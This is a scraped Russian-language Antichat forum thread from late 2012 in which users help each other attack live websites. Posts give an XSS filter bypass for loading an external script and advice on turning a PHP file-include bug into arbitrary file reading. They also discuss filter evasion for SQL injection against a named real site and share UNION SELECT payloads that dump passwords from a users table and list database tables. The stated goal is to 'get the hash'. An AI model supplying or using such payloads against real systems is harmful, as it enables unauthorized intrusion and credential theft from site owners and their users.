ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.12.2012, 05:45
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от _Spamer_
_Spamer_ said:
Ребят есть активная XSS. Имеется фильтр на слово script.
Нужно подгрузить свой js файл. Нужна альтернатива
Можнно использовать в каком-либо теге:
Код:
Code:
onload='eva("\x01\x02\x03")'
И вставлять либо с помощью getElementById или любым удобным способом.
|
|
|
31.12.2012, 06:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
3807
Репутация:
0
|
|
Помогите получить чтение файлов через этот скрипт. Ковычки экранируются.
index.php?id=15&pr=d'
Сообщение от None
Warning: fopen(includes/profiles/d\'.html) [function.fopen]: failed to open stream: No such file or directory in /www/htdocs/www.domain.com/folder/folder2/includes/src.php on line 71
Warning: filesize() [function.filesize]: stat failed for includes/profiles/d\'.html in /www/htdocs/www.domain.com/folder/folder2/includes/src.php on line 72
There are no udrtd starting with d\'.
Warning: fclose(): supplied argument is not a valid stream resource in /www/htdocs/www.domain.com/folder/folder2/includes/src.php on line 79
Код самого скрипта:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fread[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$thefile[/COLOR][COLOR="#007700"]));
echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}
else{
echo[/COLOR][COLOR="#DD0000"]"There are no users starting with[/COLOR][COLOR="#0000BB"]$letter[/COLOR][COLOR="#DD0000"]."[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);
}
} else {
include_once([/COLOR][COLOR="#DD0000"]"includes/profiles/page.html"[/COLOR][COLOR="#007700"]);
}
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Я нашел чтение файлов через другой скриптец, но там криво читает некоторые файлы(начинает не с начала). Код вот этого удалось получить нормально, надеюсь через него получить полноценное чтение. |
|
|
|
31.12.2012, 09:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Откидывай расширение и вперед.
|
|
|
|
31.12.2012, 09:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
142623
Репутация:
19
|
|
Данные в php скрипте фильтруюца такой рег-кой,
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/(\[/COLOR][COLOR="#0000BB"]W[/COLOR][COLOR="#007700"]|\[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"])/[/COLOR][/COLOR]
, можно ли обойти как-то(необходимо кавычку всунуть) или как-то выйти за кавчку в sql запросе.
С наступающим! |
|
|
|
31.12.2012, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Всем привет! http://www.mobile-review.com/cgi-bin/presents2012.pl?"&option=redirect реально раскрутить sqli?
|
|
|
|
31.12.2012, 19:15
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Добрый день! Помогите со скулей.
union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17
ни в какую не хочет пропускать круглые скобочки. Возвращает просто пустую страницу.
Работает с @@version, кстати вернуло 5.0.51a-24+lenny2+spu1 (Web Server: Apache/2.2.9 (Debian))
|
|
|
|
31.12.2012, 19:20
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
cipa21, unhex(hex(version()))
|
|
|
|
31.12.2012, 19:21
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Сообщение от Skofield
Skofield said:
cipa21
, unhex(hex(version()))
видимо я не так выразился.... в адресную строку вообще НИКАК нельзя писать скобочки, возвращает пустую страницу
не пропускает именно вместе скобки открывающуюся с закрывающейся, по отдельности работает но только толку от этого ноль
|
|
|
|
31.12.2012, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
3807
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
Откидывай расширение и вперед.
Я провтыкал, там и ковычки и null-byte экранируется. Есть еще варианты?
|
|
|
|
01.01.2013, 01:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Сообщение от cipa21
cipa21 said:
видимо я не так выразился.... в адресную строку вообще НИКАК нельзя писать скобочки, возвращает пустую страницу
не пропускает именно вместе скобки открывающуюся с закрывающейся, по отдельности работает но только толку от этого ноль
-full url encode?
-использование "@@"
А в боевых условиях (достать хеш) зачем вам скобочки?
Сообщение от None
union+select+1,2,password,4,5,6,7,8,9,10,11,12,13, 14,15,16,17+from+users+where+id=1+--+f
Сообщение от None
union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+information_schema.tables+limit +1,1+--+f
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
